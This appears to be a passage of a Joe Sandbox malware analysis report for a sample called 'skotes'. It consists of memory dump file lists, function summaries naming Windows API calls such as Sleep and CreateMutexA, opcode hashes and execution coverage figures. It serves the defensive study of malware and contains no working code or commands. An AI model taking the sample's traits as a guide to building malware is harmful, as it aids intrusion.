                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 77be9d0dab0d0002685fcd779645f35a666584d87260a804f3b0a72b1a5edec5
                                                                                                                                                                                                                                                  • Instruction ID: 7179fe89f983d0883c71c636c4fe862cda796ad4f1c03a02bf0fec0ff83b438f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77be9d0dab0d0002685fcd779645f35a666584d87260a804f3b0a72b1a5edec5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06213D317552009AFF64776C8C9AB7EB2A19F83304F34491AE10CD67D2CE7A4981B2D3
                                                                                                                                                                                                                                                  Function 0009A34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 283 9a34f-9a35b 284 9a35d-9a36b 283->284 285 9a371-9a39a call ad663 283->285 284->285 286 9a93a 284->286 291 9a3c8-9a916 call a80c0 285->291 292 9a39c-9a3a8 285->292 288 9a953-9a994 Sleep CreateMutexA 286->288 289 9a93a call c6c6a 286->289 299 9a9a7-9a9a8 288->299 300 9a996-9a998 288->300 289->288 293 9a3aa-9a3b8 292->293 294 9a3be-9a3c5 call ad663 292->294 293->286 293->294 294->291 300->299 303 9a99a-9a9a5 300->303 303->299
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 155db2c2948cd2750586fd5ab25037cae701917a98baf4a7d4c26fdb2dfc3732
                                                                                                                                                                                                                                                  • Instruction ID: 9c242420e3f1a19175b922c6b4841a10c16a63e4db34189377264e632db42a9e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 155db2c2948cd2750586fd5ab25037cae701917a98baf4a7d4c26fdb2dfc3732
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52213A317042009BFF18AB6CDC89B7DB761EB93310F24861DE404D76D1CB7696809693

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 000CCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID: 0#
                                                                                                                                                                                                                                                  • API String ID: 3213747228-476050247
                                                                                                                                                                                                                                                  • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                  • Instruction ID: 396a1b089a826520f76764278c340bc514f22139913bc94740d2b8b13a7ad802
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AB105329046459FEB25CF68C881FFEBBE5EF56340F14816EE859EB242D6349D41CB60
                                                                                                                                                                                                                                                  Function 00092EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1418687624-0
                                                                                                                                                                                                                                                  • Opcode ID: 9a4f79fc42ccc09e722bd26428c0bdd229b70a744b272172f88287294d083a6f
                                                                                                                                                                                                                                                  • Instruction ID: 3084187b41f8b72fa15150e29bea89bfc8f8afaf0a0c8d5d7a06f716021be4d6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4f79fc42ccc09e722bd26428c0bdd229b70a744b272172f88287294d083a6f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABA1C171A01605AFEF21DFA4C945BAAB7F8FF15310F048139E816D7252EB35EA04DB91

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:11.8%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:17.3%
                                                                                                                                                                                                                                                  Signature Coverage:7.6%
                                                                                                                                                                                                                                                  Total number of Nodes:1311
                                                                                                                                                                                                                                                  Total number of Limit Nodes:28
